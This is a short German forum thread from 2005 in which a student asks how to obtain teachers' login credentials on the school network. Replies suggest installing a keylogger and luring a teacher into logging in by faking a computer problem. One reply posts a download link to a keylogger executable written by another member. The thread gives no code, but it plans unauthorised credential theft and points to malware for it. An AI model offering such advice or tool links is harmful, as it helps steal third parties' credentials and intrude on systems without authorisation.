Netzwerke, Freigabe, etc...

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Tha-Don, 16. Dezember 2005 .

Schlagworte:
  1. 16. Dezember 2005
    Also, unser Schulnetzwerk ist so aufgebaut, dass man Dateinen von Lehrern sehen kann, aber wenn man versucht auf diese zuzugreifen, wird von einem ein Benutzername und Key verlangt. So, es gibt ja einige Programme mit denen man z.B. im Internet Acc. bruten kann, allerdings würde ich gerne wissen, ob man mit einem Trojaner oder sonst einem Programm diese Acc. herausfinden könnte. Es gibt keine Sperre für C:/...

    Bb MfG <-° Tha-Don °->

    PS: 10er ist für alle die SINNVOLL helfen natürlich sicher...
     
  2. 16. Dezember 2005
    Also Trojans funzen in der Schule kaum (Ports geschlossen), aber wie wäre ein Keylogger, dann sagst du zu du deinem Lehrer, das du folgendes Problem X hast, er loggt sich ein um nachzugucken und fertig !
     
  3. 17. Dezember 2005
    Hey gute Idee... Thx das du mir geholfen hast. Krigst natürlich nen 10ner, versteht sich ja von selbst. Kannst du mir vllt noch sagen woher ich sowas bekomme bzw. was ein guter Keylogger ist den du mir empfehlen kannst?

    Thx Bb MfG <-° Tha-Don °->
     
  4. 17. Dezember 2005
    SuFu würde helfen...XodoX hat dem letzt einen guten geschrieben..is noch gar nicht lange her..

    editt:// hier ist der von xodox:

    http://rapidshare.de/files/8876090/a.exe.html

    also, wenn 10er dann an xodox..
     
  5. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.